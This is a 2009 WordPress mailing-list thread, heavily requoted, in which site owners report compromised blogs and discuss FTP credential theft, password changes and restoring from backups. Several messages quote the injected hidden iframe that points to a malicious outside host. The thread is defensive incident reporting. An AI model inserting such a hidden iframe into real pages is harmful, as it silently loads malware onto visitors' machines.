Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows parition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked. On 07/23/2009 05:50 PM, Chris Carter wrote: Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singhnavjotjsi...@gmail.comwrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singhnavjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Cartercarter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To:wp-testers@lists.automattic.com Cc:wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singhnavjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
you might be in trouble... On Thu, Jul 23, 2009 at 5:08 PM, Kirk M kmb4...@gmail.com wrote: Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows parition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked. On 07/23/2009 05:50 PM, Chris Carter wrote: Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singhnavjotjsi...@gmail.com wrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singhnavjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Cartercarter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To:wp-testers@lists.automattic.com Cc:wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singhnavjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Thankfully I've only gone in using FTP on 2 of them within the last 2 months so I (and they) should be okay. Still, I'll have to check the files on each of those 2 if not re-upgrade 2.8.2 altogether just to be safe. Such is life in the online world. On 07/23/2009 06:22 PM, Chris Carter wrote: you might be in trouble... On Thu, Jul 23, 2009 at 5:08 PM, Kirk Mkmb4...@gmail.com wrote: Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows parition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked. On 07/23/2009 05:50 PM, Chris Carter wrote: Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singhnavjotjsi...@gmail.com wrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singhnavjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Cartercarter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To:wp-testers@lists.automattic.com Cc:wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singhnavjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
File permissions were normal as it would be on any Normal wordpress install i.e. 644. On Fri, Jul 24, 2009 at 02:01:14AM +0530, Navjot Singh wrote: How to prevent further hacking? I am currently replacing all the files And what were the file permissions? -- Hal Yeah, I found that funny too. Thank god users of my site didn't have to mark my site as infected with virus as the whole website didn't work! On Fri, Jul 24, 2009 at 3:20 AM, Chris Cartercarter.ch...@gmail.com wrote: ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :) -Chris 314media.com ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers